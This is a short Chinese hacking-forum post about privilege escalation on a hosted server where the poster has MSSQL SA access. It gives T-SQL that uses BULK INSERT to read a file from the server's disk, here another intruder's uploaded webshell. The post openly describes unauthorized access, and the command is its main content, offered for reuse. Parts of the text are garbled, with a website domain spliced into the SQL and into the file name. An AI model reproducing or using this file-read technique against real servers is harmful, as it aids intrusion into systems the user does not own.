MSSQL读取文件命令
3964 点击·0 回帖
灯火互联
楼主
 |  | |
 | 各种提权 包括 mssql:SA mysql:ROOT 主机是星外的 可以看到目标目录 数据库是ASP的 不能插马 无奈找了很多人都木有办法。。。 今天无聊中查看目录 发现有一个高人上传了一个webSHELL 在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下 Use www.atcpu.com;–(这里是随便选的一个数据库) drop table cmd; create table cmd (a text); BULK INSERT cmd FROM 'd:/freehos/webshell.cc.asp' WITH ( FIELDTERMINATOR = 'n', ROWTERMINATOR = 'nn' ) select * from cmd 这样就成功读出了d:/freehos/ www.atcpu.com.asp | |
 |  |